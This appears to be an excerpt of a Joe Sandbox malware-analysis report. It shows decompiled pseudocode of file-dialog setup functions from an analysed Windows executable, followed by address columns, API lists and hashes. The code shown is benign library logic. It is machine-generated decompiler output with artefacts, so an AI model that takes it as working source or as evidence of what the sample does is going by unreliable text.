					_t372 =  *((intOrPtr*)(__ecx + 0x74));
					_t450 = 0;
					if( *((intOrPtr*)(_t372 + 0x30)) != 0) {
						_t365 =  *((intOrPtr*)(__ecx + 0x80));
						_t461 =  *((intOrPtr*)( *_t365 + 0x44))(_t365,  *((intOrPtr*)(_t372 + 0x30)));
						_t375 = 0 | _t461 < 0x00000000;
						if(_t461 < 0) {
							L3:
							E00413DD0(_t375);
						}
					}
					_t284 =  *((intOrPtr*)(_t369 + 0x74));
					_t463 =  *((intOrPtr*)(_t284 + 0x3c)) - _t450;
					if( *((intOrPtr*)(_t284 + 0x3c)) != _t450) {
						E00410F00(_t369, _t456 - 0x20, _t450, _t451, _t463);
						_t361 =  *(_t369 + 0x80);
						 *(_t456 - 4) = _t450;
						_t464 =  *((intOrPtr*)( *_t361 + 0x58))(_t361,  *(_t456 - 0x20),  *((intOrPtr*)(_t284 + 0x3c))) - _t450;
						_t375 = 0 | _t464 >= 0x00000000;
						if(_t464 >= 0 == _t450) {
							goto L3;
						} else {
							 *(_t456 - 4) =  *(_t456 - 4) | 0xffffffff;
							E004055F0( *(_t456 - 0x20) + 0xfffffff0);
						}
					}
					_t285 =  *((intOrPtr*)(_t369 + 0x74));
					if( *(_t285 + 0xc) != _t450) {
						_t451 =  *(_t285 + 0xc);
						 *(_t456 - 0x14) = _t450;
						if( *_t451 != _t450) {
							do {
								_t452 = _t451 + 2 + E00429211(_t451) * 2;
								_t323 = E00429211(_t452);
								 *(_t456 - 0x14) =  *(_t456 - 0x14) + 1;
								_t451 = _t452 + 2 + _t323 * 2;
							} while ( *_t451 != _t450);
							_t324 =  *(_t456 - 0x14);
							_t470 =  *(_t456 - 0x14) - _t450;
							if( *(_t456 - 0x14) > _t450) {
								_t439 = 8;
								_t450 = E0040B71F(_t470,  ~(0 | _t470 > 0x00000000) | _t324 * _t439);
								_pop(_t382);
								if(_t450 == 0) {
									L12:
									E00413D98(_t382);
								}
								 *(_t456 - 0x20) =  *(_t456 - 0x20) & 0x00000000;
								_t472 =  *(_t456 - 0x14);
								_t453 =  *((intOrPtr*)( *((intOrPtr*)(_t369 + 0x74)) + 0xc));
								if( *(_t456 - 0x14) > 0) {
									while(1) {
										E00404820(_t456 - 0x1c);
										 *(_t456 - 4) = 1;
										_t369 = E00429211(_t453) + 1;
										_t442 = 2;
										_t342 = E0040B71F(_t472,  ~(0 | _t472 > 0x00000000) | _t369 * _t442);
										_pop(_t382);
										 *((intOrPtr*)(_t456 - 0x18)) = _t342;
										_t473 = _t342;
										if(_t473 == 0) {
											goto L12;
										}
										E00405C40(_t456 - 0x1c, _t453);
										_t398 =  *(_t456 - 0x1c);
										E0042814C(_t369,  *(_t456 - 0x1c),  *((intOrPtr*)(_t456 - 0x18)),  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) +  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + 2, _t398,  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + _t345 + 2);
										_t369 = _t453 + _t369 * 2;
										 *((intOrPtr*)(_t450 +  *(_t456 - 0x20) * 8)) =  *((intOrPtr*)(_t456 - 0x18));
										_t455 = E00429211(_t369) + 1;
										_t445 = 2;
										_t382 =  ~(_t473 > 0) | _t455 * _t445;
										_t352 = E0040B71F(_t473,  ~(_t473 > 0) | _t455 * _t445);
										_t457 = _t457 + 0x18;
										 *((intOrPtr*)(_t456 - 0x18)) = _t352;
										if(_t352 == 0) {
											goto L12;
										} else {
											E00405C40(_t456 - 0x1c, _t369);
											_t404 =  *(_t456 - 0x1c);
											E0042814C(_t369,  *(_t456 - 0x1c),  *((intOrPtr*)(_t456 - 0x18)),  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) +  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + 2, _t404,  *((intOrPtr*)( *(_t456 - 0x1c) - 0xc)) + _t354 + 2);
											 *(_t456 - 4) =  *(_t456 - 4) | 0xffffffff;
											 *((intOrPtr*)(_t450 + 4 +  *(_t456 - 0x20) * 8)) =  *((intOrPtr*)(_t456 - 0x18));
											_t457 = _t457 + 0x10;
											 *(_t456 - 0x20) =  *(_t456 - 0x20) + 1;
											_t453 = _t369 + _t455 * 2;
											E004055F0( *(_t456 - 0x1c) + 0xfffffff0);
											if( *(_t456 - 0x20) <  *(_t456 - 0x14)) {
												continue;
											} else {
												_t369 =  *(_t456 - 0x24);
											}
										}
										goto L18;
									}
									goto L12;
								}
								L18:
								_t328 =  *(_t369 + 0x80);
								_t476 =  *((intOrPtr*)( *_t328 + 0x10))(_t328,  *(_t456 - 0x14), _t450);
								_t375 = 0 | _t476 >= 0x00000000;
								_t451 = 0;
								if(_t476 >= 0) {
									goto L3;
								} else {
									_t478 =  *(_t456 - 0x14);
									if( *(_t456 - 0x14) > 0) {
										do {
											E0040B74E(_t369, _t450, _t451, _t478,  *((intOrPtr*)(_t450 + _t451 * 8)));
											E0040B74E(_t369, _t450, _t451, _t478,  *((intOrPtr*)(_t450 + 4 + _t451 * 8)));
											_t451 = _t451 + 1;
											_t479 = _t451 -  *(_t456 - 0x14);
										} while (_t451 <  *(_t456 - 0x14));
									}
									E0040B74E(_t369, _t450, _t451, _t479, _t450);
									_t332 =  *((intOrPtr*)(_t369 + 0x74));
									_t387 = 1;
									if( *((intOrPtr*)(_t332 + 0x18)) > 1) {
										_t387 =  *((intOrPtr*)(_t332 + 0x18));
									}
									_t333 =  *(_t369 + 0x80);
									_t481 =  *((intOrPtr*)( *_t333 + 0x14))(_t333, _t387);
									_t375 = 0 | _t481 >= 0x00000000;
									if(_t481 >= 0) {
										goto L3;
									} else {
										_t450 = 0;
									}
								}
							}
						}
					}
					_t286 =  *((intOrPtr*)(_t369 + 0x74));
					if( *((intOrPtr*)(_t286 + 0x1c)) != _t450 ||  *((intOrPtr*)(_t286 + 0x2c)) != _t450) {
						_t373 = _t456 - 0x14;
						E00404820(_t456 - 0x14);
						_t288 =  *((intOrPtr*)(_t369 + 0x74));
						 *(_t456 - 4) = 2;
						_t486 =  *((intOrPtr*)(_t288 + 0x1c)) - _t450;
						if( *((intOrPtr*)(_t288 + 0x1c)) == _t450) {
							L32:
							_t289 =  *((intOrPtr*)(_t369 + 0x74));
							_t451 =  *(_t456 - 0x14);
							if( *((intOrPtr*)( *((intOrPtr*)(_t369 + 0x74)) + 0x2c)) == _t450) {
								L35:
								if( *((intOrPtr*)(_t451 - 0xc)) == _t450) {
									goto L45;
								} else {
									goto L36;
								}
							} else {
								if( *((intOrPtr*)(_t451 - 0xc)) != _t450) {
									L36:
									 *(_t456 - 0x1c) = _t450;
									if(( *0x44f74c & 0x00000001) == 0) {
										 *0x44f74c =  *0x44f74c | 0x00000001;
										_push(L"Shell32.dll");
										 *(_t456 - 4) = 4;
										 *0x44f748 = E00411FDC(_t369, _t373, _t450, _t451,  *0x44f74c);
										 *(_t456 - 4) = 2;
									}
									_t375 =  *0x44f748; // 0x0
									if((0 | _t375 != _t450) == _t450) {
										goto L3;
									} else {
										if(( *0x44f74c & 0x00000002) == 0) {
											 *0x44f74c =  *0x44f74c | 0x00000002;
											 *0x44f744 = GetProcAddress(_t375, "SHCreateItemFromParsingName");
										}
										_t375 =  *0x44f744; // 0x0
										if((0 | _t375 != _t450) == _t450) {
											goto L3;
										} else {
											_push(_t456 - 0x1c);
											_push(0x43e3c4);
											_push(_t450);
											_push(_t451);
											if(_t375->i() < _t450) {
												L45:
												 *(_t456 - 4) =  *(_t456 - 4) | 0xffffffff;
												_t174 = _t451 - 0x10; // -16
												E004055F0(_t174);
											} else {
												_t302 =  *(_t369 + 0x80);
												_t504 =  *((intOrPtr*)( *_t302 + 0x30))(_t302,  *(_t456 - 0x1c)) - _t450;
												_t375 = 0 | _t504 >= 0x00000000;
												if(_t504 >= 0 == _t450) {
													goto L3;
												} else {
													_t305 =  *(_t456 - 0x1c);
													 *((intOrPtr*)( *_t305 + 8))(_t305);
													goto L45;
												}
											}
										}
									}
								} else {
									_t373 = _t456 - 0x14;
									E00405C40(_t456 - 0x14,  *((intOrPtr*)(_t289 + 0x2c)));
									_t451 =  *(_t456 - 0x14);
									goto L35;
								}
							}
						} else {
							_push( *((intOrPtr*)(_t288 + 0x1c)));
							E00410F00(_t369, _t456 - 0x20, _t450, _t451, _t486);
							 *(_t456 - 4) = 3;
							E00405630(_t456 - 0x14, _t486, _t456 - 0x20);
							PathRemoveFileSpecW(E00412509(_t456 - 0x14));
							E0040E100(_t369, _t456 - 0x14, _t450, 0xffffffff);
							_t451 =  *( *(_t456 - 0x14) - 0xc);
							if(E00404DE0(_t369, _t456 - 0x20, _t450, _t451, _t451) == 0x5c) {
								_t451 = _t451 + 1;
							}
							_t318 =  *(_t369 + 0x80);
							_t489 =  *((intOrPtr*)( *_t318 + 0x3c))(_t318,  *(_t456 - 0x20) + _t451 * 2) - _t450;
							_t375 = 0 | _t489 >= 0x00000000;
							if(_t489 >= 0 == _t450) {
								goto L3;
							} else {
								_t373 =  *(_t456 - 0x20) + 0xfffffff0;
								 *(_t456 - 4) = 2;
								E004055F0( *(_t456 - 0x20) + 0xfffffff0);
								goto L32;
							}
						}
					}
					_t291 =  *(_t369 + 0x80);
					_push(_t456 - 0x10);
					 *(_t456 - 0x10) = _t450;
					_t375 =  *_t291;
					_push(_t291);
					if( *((intOrPtr*)( *_t291 + 0x28))() < 0) {
						goto L3;
					}
					_t294 =  *((intOrPtr*)(_t369 + 0x74));
					if(( *(_t294 + 0x34) & 0x00000200) == 0) {
						_t185 = _t456 - 0x10;
						 *_t185 =  *(_t456 - 0x10) & 0xfffffdff;
						__eflags =  *_t185;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000200;
					}
					if(( *(_t294 + 0x34) & 0x00002000) == 0) {
						_t192 = _t456 - 0x10;
						 *_t192 =  *(_t456 - 0x10) & 0xffffdfff;
						__eflags =  *_t192;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00002000;
					}
					if(( *(_t294 + 0x34) & 0x02000000) == 0) {
						_t199 = _t456 - 0x10;
						 *_t199 =  *(_t456 - 0x10) & 0xfdffffff;
						__eflags =  *_t199;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x02000000;
					}
					if(( *(_t294 + 0x34) & 0x00001000) == 0) {
						_t206 = _t456 - 0x10;
						 *_t206 =  *(_t456 - 0x10) & 0xffffefff;
						__eflags =  *_t206;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00001000;
					}
					if(( *(_t294 + 0x34) & 0x10000000) == 0) {
						_t213 = _t456 - 0x10;
						 *_t213 =  *(_t456 - 0x10) & 0xefffffff;
						__eflags =  *_t213;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x10000000;
					}
					if(( *(_t294 + 0x34) & 0x00000008) == 0) {
						_t220 = _t456 - 0x10;
						 *_t220 =  *(_t456 - 0x10) & 0xfffffff7;
						__eflags =  *_t220;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000008;
					}
					if(( *(_t294 + 0x34) & 0x00100000) == 0) {
						_t227 = _t456 - 0x10;
						 *_t227 =  *(_t456 - 0x10) & 0xffefffff;
						__eflags =  *_t227;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00100000;
					}
					if(( *(_t294 + 0x34) & 0x00008000) == 0) {
						_t234 = _t456 - 0x10;
						 *_t234 =  *(_t456 - 0x10) & 0xffff7fff;
						__eflags =  *_t234;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00008000;
					}
					if(( *(_t294 + 0x34) & 0x00010000) == 0) {
						_t241 = _t456 - 0x10;
						 *_t241 =  *(_t456 - 0x10) & 0xfffeffff;
						__eflags =  *_t241;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00010000;
					}
					if(( *(_t294 + 0x34) & 0x00000100) == 0) {
						_t248 = _t456 - 0x10;
						 *_t248 =  *(_t456 - 0x10) & 0xfffffeff;
						__eflags =  *_t248;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000100;
					}
					if(( *(_t294 + 0x34) & 0x00000002) == 0) {
						_t255 = _t456 - 0x10;
						 *_t255 =  *(_t456 - 0x10) & 0xfffffffd;
						__eflags =  *_t255;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000002;
					}
					if(( *(_t294 + 0x34) & 0x00000800) == 0) {
						_t262 = _t456 - 0x10;
						 *_t262 =  *(_t456 - 0x10) & 0xfffff7ff;
						__eflags =  *_t262;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00000800;
					}
					_t375 = 0x4000;
					if(( *(_t294 + 0x34) & 0x00004000) == 0) {
						_t269 = _t456 - 0x10;
						 *_t269 =  *(_t456 - 0x10) & 0xffffbfff;
						__eflags =  *_t269;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00004000;
					}
					if(( *(_t294 + 0x54) & 0x00000001) == 0) {
						_t276 = _t456 - 0x10;
						 *_t276 =  *(_t456 - 0x10) & 0xfffbffff;
						__eflags =  *_t276;
					} else {
						 *(_t456 - 0x10) =  *(_t456 - 0x10) | 0x00040000;
					}
					_t369 =  *(_t369 + 0x80);
					_push( *(_t456 - 0x10));
					_push(_t369);
					if( *((intOrPtr*)( *_t369 + 0x24))() < 0) {
						goto L3;
					}
				}
				return E00429303(_t282);
			}







































                  0x00412ae3
                  0x00412ae3
                  0x00412aea
                  0x00412aef
                  0x00412af1
                  0x00412af8
                  0x00412afe
                  0x00412b01
                  0x00412b06
                  0x00412b08
                  0x00412b19
                  0x00412b1b
                  0x00412b22
                  0x00412b24
                  0x00412b24
                  0x00412b24
                  0x00412b22
                  0x00412b29
                  0x00412b2c
                  0x00412b2f
                  0x00412b37
                  0x00412b3c
                  0x00412b48
                  0x00412b50
                  0x00412b52
                  0x00412b59
                  0x00000000
                  0x00412b5b
                  0x00412b5e
                  0x00412b65
                  0x00412b65
                  0x00412b59
                  0x00412b6a
                  0x00412b70
                  0x00412b76
                  0x00412b79
                  0x00412b7f
                  0x00412b85
                  0x00412b8b
                  0x00412b90
                  0x00412b95
                  0x00412b98
                  0x00412b9e
                  0x00412ba3
                  0x00412ba6
                  0x00412ba8
                  0x00412bb2
                  0x00412bc2
                  0x00412bc4
                  0x00412bc7
                  0x00412bc9
                  0x00412bc9
                  0x00412bc9
                  0x00412bd1
                  0x00412bd5
                  0x00412bd9
                  0x00412bdc
                  0x00412be2
                  0x00412be5
                  0x00412beb
                  0x00412bf9
                  0x00412bfe
                  0x00412c0b
                  0x00412c11
                  0x00412c12
                  0x00412c15
                  0x00412c17
                  0x00000000
                  0x00000000
                  0x00412c1d
                  0x00412c22
                  0x00412c36
                  0x00412c41
                  0x00412c45
                  0x00412c4f
                  0x00412c54
                  0x00412c5e
                  0x00412c61
                  0x00412c66
                  0x00412c69
                  0x00412c6e
                  0x00000000
                  0x00412c74
                  0x00412c78
                  0x00412c7d
                  0x00412c91
                  0x00412c9c
                  0x00412ca0
                  0x00412ca7
                  0x00412caa
                  0x00412cb0
                  0x00412cb3
                  0x00412cbe
                  0x00000000
                  0x00412cc4
                  0x00412cc4
                  0x00412cc4
                  0x00412cbe
                  0x00000000
                  0x00412c6e
                  0x00000000
                  0x00412be2
                  0x00412cc7
                  0x00412cc7
                  0x00412cd9
                  0x00412cdb
                  0x00412cde
                  0x00412ce4
                  0x00000000
                  0x00412cea
                  0x00412cea
                  0x00412ced
                  0x00412cef
                  0x00412cf2
                  0x00412cfb
                  0x00412d00
                  0x00412d03
                  0x00412d03
                  0x00412cef
                  0x00412d09
                  0x00412d0e
                  0x00412d14
                  0x00412d18
                  0x00412d1a
                  0x00412d1a
                  0x00412d1d
                  0x00412d2c
                  0x00412d2e
                  0x00412d35
                  0x00000000
                  0x00412d3b
                  0x00412d3b
                  0x00412d3b
                  0x00412d35
                  0x00412ce4
                  0x00412ba8
                  0x00412b7f
                  0x00412d3d
                  0x00412d43
                  0x00412d4e
                  0x00412d51
                  0x00412d56
                  0x00412d59
                  0x00412d60
                  0x00412d63
                  0x00412de2
                  0x00412de2
                  0x00412de5
                  0x00412deb
                  0x00412e00
                  0x00412e03
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00412ded
                  0x00412df0
                  0x00412e09
                  0x00412e10
                  0x00412e13
                  0x00412e15
                  0x00412e1c
                  0x00412e21
                  0x00412e2b
                  0x00412e30
                  0x00412e30
                  0x00412e34
                  0x00412e43
                  0x00000000
                  0x00412e49
                  0x00412e50
                  0x00412e52
                  0x00412e65
                  0x00412e65
                  0x00412e6a
                  0x00412e79
                  0x00000000
                  0x00412e7f
                  0x00412e82
                  0x00412e83
                  0x00412e88
                  0x00412e89
                  0x00412e8e
                  0x00412eb9
                  0x00412eb9
                  0x00412ebd
                  0x00412ec0
                  0x00412e90
                  0x00412e90
                  0x00412ea1
                  0x00412ea3
                  0x00412eaa
                  0x00000000
                  0x00412eb0
                  0x00412eb0
                  0x00412eb6
                  0x00000000
                  0x00412eb6
                  0x00412eaa
                  0x00412e8e
                  0x00412e79
                  0x00412df2
                  0x00412df5
                  0x00412df8
                  0x00412dfd
                  0x00000000
                  0x00412dfd
                  0x00412df0
                  0x00412d65
                  0x00412d65
                  0x00412d6b
                  0x00412d77
                  0x00412d7b
                  0x00412d89
                  0x00412d94
                  0x00412d9c
                  0x00412dac
                  0x00412dae
                  0x00412dae
                  0x00412db2
                  0x00412dc4
                  0x00412dc6
                  0x00412dcd
                  0x00000000
                  0x00412dd3
                  0x00412dd6
                  0x00412dd9
                  0x00412ddd
                  0x00000000
                  0x00412ddd
                  0x00412dcd
                  0x00412d63
                  0x00412ec5
                  0x00412ece
                  0x00412ecf
                  0x00412ed2
                  0x00412ed4
                  0x00412eda
                  0x00000000
                  0x00000000
                  0x00412ee0
                  0x00412eeb
                  0x00412ef2
                  0x00412ef2
                  0x00412ef2
                  0x00412eed
                  0x00412eed
                  0x00412eed
                  0x00412f01
                  0x00412f08
                  0x00412f08
                  0x00412f08
                  0x00412f03
                  0x00412f03
                  0x00412f03
                  0x00412f17
                  0x00412f1e
                  0x00412f1e
                  0x00412f1e
                  0x00412f19
                  0x00412f19
                  0x00412f19
                  0x00412f2d
                  0x00412f34
                  0x00412f34
                  0x00412f34
                  0x00412f2f
                  0x00412f2f
                  0x00412f2f
                  0x00412f43
                  0x00412f4a
                  0x00412f4a
                  0x00412f4a
                  0x00412f45
                  0x00412f45
                  0x00412f45
                  0x00412f55
                  0x00412f5d
                  0x00412f5d
                  0x00412f5d
                  0x00412f57
                  0x00412f57
                  0x00412f57
                  0x00412f69
                  0x00412f70
                  0x00412f70
                  0x00412f70
                  0x00412f6b
                  0x00412f6b
                  0x00412f6b
                  0x00412f7f
                  0x00412f86
                  0x00412f86
                  0x00412f86
                  0x00412f81
                  0x00412f81
                  0x00412f81
                  0x00412f95
                  0x00412f9c
                  0x00412f9c
                  0x00412f9c
                  0x00412f97
                  0x00412f97
                  0x00412f97
                  0x00412fab
                  0x00412fb2
                  0x00412fb2
                  0x00412fb2
                  0x00412fad
                  0x00412fad
                  0x00412fad
                  0x00412fbd
                  0x00412fc5
                  0x00412fc5
                  0x00412fc5
                  0x00412fbf
                  0x00412fbf
                  0x00412fbf
                  0x00412fd1
                  0x00412fd8
                  0x00412fd8
                  0x00412fd8
                  0x00412fd3
                  0x00412fd3
                  0x00412fd3
                  0x00412fdf
                  0x00412fe7
                  0x00412fee
                  0x00412fee
                  0x00412fee
                  0x00412fe9
                  0x00412fe9
                  0x00412fe9
                  0x00412ff9
                  0x00413004
                  0x00413004
                  0x00413004
                  0x00412ffb
                  0x00412ffb
                  0x00412ffb
                  0x0041300b
                  0x00413011
                  0x00413016
                  0x0041301c
                  0x00000000
                  0x00000000
                  0x0041301c
                  0x00413027

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00412AEA
                  • _wcslen.LIBCMT ref: 00412B86
                  • _wcslen.LIBCMT ref: 00412B90
                  • _wcslen.LIBCMT ref: 00412BF2
                  • _memcpy_s.LIBCMT ref: 00412C36
                  • _wcslen.LIBCMT ref: 00412C48
                  • _memcpy_s.LIBCMT ref: 00412C91
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 00412D89
                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00412E5F
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _wcslen$H_prolog3_memcpy_s$AddressAllocatorDebugException@8FileHeapPathProcRemoveSpecThrow
                  • String ID: SHCreateItemFromParsingName$Shell32.dll
                  • API String ID: 1593954047-214508289
                  • Opcode ID: 3a871ebe44f67a8adc3c43ddc3dc3a7330ca7e448866e293d60490ee2505cd85
                  • Instruction ID: 76ce762e018b96d02787904f7ab448ee36e1499435031be9c6180e8cffc8725b
                  • Opcode Fuzzy Hash: 3a871ebe44f67a8adc3c43ddc3dc3a7330ca7e448866e293d60490ee2505cd85
                  • Instruction Fuzzy Hash: 97F1AF309002168FCB18DF64CA85AFEB7B5FF44315F14466EE411EB2E2D7B89951CB58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041286F, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175memorycomUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 61%
                  			E0041286F(void* __ebx, intOrPtr __ecx, struct _OSVERSIONINFOW __edi, void* __esi, void* __eflags) {
				intOrPtr _t87;
				signed int _t90;
				intOrPtr _t102;
				void* _t105;
				intOrPtr* _t106;
				intOrPtr* _t108;
				short* _t115;
				intOrPtr _t116;
				signed int _t120;
				void* _t127;
				short* _t128;
				signed char _t129;
				void* _t138;
				intOrPtr _t148;
				void* _t149;
				void* _t150;
				signed int _t159;

				_t145 = __edi;
				_push(0x12c);
				E00429294(E00438BE0, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t149 - 0x130)) =  *((intOrPtr*)(_t149 + 0x10));
				 *((intOrPtr*)(_t149 - 0x12c)) =  *((intOrPtr*)(_t149 + 0x18));
				_t148 = __ecx;
				 *((intOrPtr*)(_t149 - 0x138)) = __ecx;
				E0041209C(__ecx,  *((intOrPtr*)(_t149 + 0x1c)));
				 *((intOrPtr*)(_t149 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x43e234;
				E00404820(__ecx + 0x8c);
				 *((intOrPtr*)(_t148 + 0x31c)) = 0;
				 *((char*)(_t149 - 4)) = 1;
				 *((intOrPtr*)(_t148 + 0x320)) = 0;
				if( *((intOrPtr*)(_t149 + 0x20)) == 0) {
					_t145 = 0x114;
					E004281D0(0x114, _t149 - 0x124, 0, 0x114);
					_t150 = _t150 + 0xc;
					 *(_t149 - 0x124) = 0x114;
					_t120 = GetVersionExW(_t149 - 0x124);
					 *((intOrPtr*)(_t149 + 0x20)) = 0x58;
					asm("sbb eax, eax");
					 *(_t148 + 0x78) =  !_t120 &  *(_t149 + 0x24);
				}
				_t87 = E004282CD(0, _t138, _t145,  *((intOrPtr*)(_t149 + 0x20)));
				_pop(_t127);
				 *((intOrPtr*)(_t148 + 0x74)) = _t87;
				if(_t87 == 0) {
					_t87 = E00413D98(_t127);
				}
				E004281D0(_t145, _t87, 0,  *((intOrPtr*)(_t149 + 0x20)));
				_t128 = _t148 + 0x90;
				 *_t128 = 0;
				_t146 = _t148 + 0x110;
				 *_t146 = 0;
				_t90 =  *(_t149 + 8);
				 *(_t148 + 0x88) = _t90;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t148 + 0x54)) =  ~_t90 + 0x7005;
				 *((intOrPtr*)(_t148 + 0x318)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)))) =  *((intOrPtr*)(_t149 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x1c)) = _t146;
				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t149 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 0x24)) = _t128;
				_t129 = 0x40;
				 *( *((intOrPtr*)(_t148 + 0x74)) + 0x28) = _t129;
				 *( *((intOrPtr*)(_t148 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t148 + 0x74)) + 0x34) |  *(_t149 + 0x14) | 0x00080020;
				if(( *(_t149 + 0x14) & _t129) != 0) {
					_t116 =  *((intOrPtr*)(_t148 + 0x74));
					_t50 = _t116 + 0x34;
					 *_t50 =  *(_t116 + 0x34) & 0xff7fffff;
					_t159 =  *_t50;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t148 + 0x74)) + 8)) =  *((intOrPtr*)(E0042083D(0, _t146, _t148, _t159) + 0xc));
				_t102 =  *((intOrPtr*)(_t148 + 0x74));
				 *((intOrPtr*)(_t102 + 0x44)) = E004218E7;
				if( *((intOrPtr*)(_t149 - 0x130)) != 0) {
					_t102 = E0041594E(_t146, 0x104,  *((intOrPtr*)(_t149 - 0x130)), 0xffffffff);
				}
				_t161 =  *((intOrPtr*)(_t149 - 0x12c));
				if( *((intOrPtr*)(_t149 - 0x12c)) != 0) {
					_t146 = _t148 + 0x8c;
					E00404880(_t148 + 0x8c,  *((intOrPtr*)(_t149 - 0x12c)));
					_t114 = E00405860(_t148 + 0x8c, _t161, 0);
					while(1) {
						_t115 = E0042ABC5(_t114, 0x7c);
						if(_t115 == 0) {
							break;
						}
						 *_t115 = 0;
						_t114 = _t115 + 2;
						__eflags = _t115 + 2;
					}
					_t102 =  *((intOrPtr*)(_t148 + 0x74));
					 *((intOrPtr*)(_t102 + 0xc)) =  *((intOrPtr*)(_t148 + 0x8c));
				}
				if( *(_t148 + 0x78) == 1) {
					__imp__CoInitializeEx(0, 2);
					if(_t102 < 0) {
						L23:
						 *(_t148 + 0x78) = 0;
					} else {
						_t105 = _t149 - 0x128;
						_push(_t105);
						_push(0x43e3b4);
						_t146 = _t148 + 0x31c;
						_push(1);
						 *_t146 = 0x43e1e4;
						 *((intOrPtr*)(_t148 + 0x320)) = 0x43e214;
						_push(0);
						if( *(_t148 + 0x88) == 0) {
							_push(0x44b684);
						} else {
							_push(0x44b674);
						}
						__imp__CoCreateInstance();
						if(_t105 < 0) {
							goto L23;
						} else {
							_t106 =  *((intOrPtr*)(_t149 - 0x128));
							_t131 =  *_t106;
							_push(_t149 - 0x134);
							_push(0x43e1a8);
							_push(_t106);
							if( *((intOrPtr*)( *_t106))() < 0) {
								L20:
								E00413DD0(_t131);
							}
							_t108 =  *((intOrPtr*)(_t149 - 0x128));
							_t131 =  *_t108;
							_push(_t148 + 0x7c);
							_push(_t146);
							_push(_t108);
							if( *((intOrPtr*)( *_t108 + 0x1c))() < 0) {
								goto L20;
							}
							 *((intOrPtr*)(_t148 + 0x80)) =  *((intOrPtr*)(_t149 - 0x128));
							 *((intOrPtr*)(_t148 + 0x84)) =  *((intOrPtr*)(_t149 - 0x134));
						}
					}
				}
				return E00429317(0, _t146, _t148);
			}




















                  0x0041286f
                  0x0041286f
                  0x00412879
                  0x00412881
                  0x0041288a
                  0x00412893
                  0x00412896
                  0x0041289c
                  0x004128a9
                  0x004128ac
                  0x004128b2
                  0x004128b7
                  0x004128bd
                  0x004128c1
                  0x004128ca
                  0x004128cc
                  0x004128da
                  0x004128df
                  0x004128e9
                  0x004128ef
                  0x004128fc
                  0x00412903
                  0x0041290a
                  0x0041290a
                  0x00412910
                  0x00412915
                  0x00412916
                  0x0041291b
                  0x0041291d
                  0x0041291d
                  0x00412927
                  0x00412931
                  0x00412937
                  0x0041293a
                  0x00412940
                  0x00412943
                  0x00412946
                  0x00412951
                  0x00412958
                  0x0041295e
                  0x00412964
                  0x0041296c
                  0x00412972
                  0x0041297c
                  0x00412985
                  0x0041298d
                  0x0041298e
                  0x0041299a
                  0x004129a0
                  0x004129a2
                  0x004129a5
                  0x004129a5
                  0x004129a5
                  0x004129a5
                  0x004129b7
                  0x004129ba
                  0x004129bd
                  0x004129ca
                  0x004129da
                  0x004129df
                  0x004129e2
                  0x004129e8
                  0x004129f0
                  0x004129f8
                  0x00412a00
                  0x00412a0f
                  0x00412a12
                  0x00412a1b
                  0x00000000
                  0x00000000
                  0x00412a09
                  0x00412a0c
                  0x00412a0c
                  0x00412a0c
                  0x00412a1d
                  0x00412a26
                  0x00412a26
                  0x00412a2d
                  0x00412a36
                  0x00412a3e
                  0x00412ad6
                  0x00412ad6
                  0x00412a44
                  0x00412a44
                  0x00412a4a
                  0x00412a4b
                  0x00412a50
                  0x00412a56
                  0x00412a58
                  0x00412a5e
                  0x00412a68
                  0x00412a6f
                  0x00412a78
                  0x00412a71
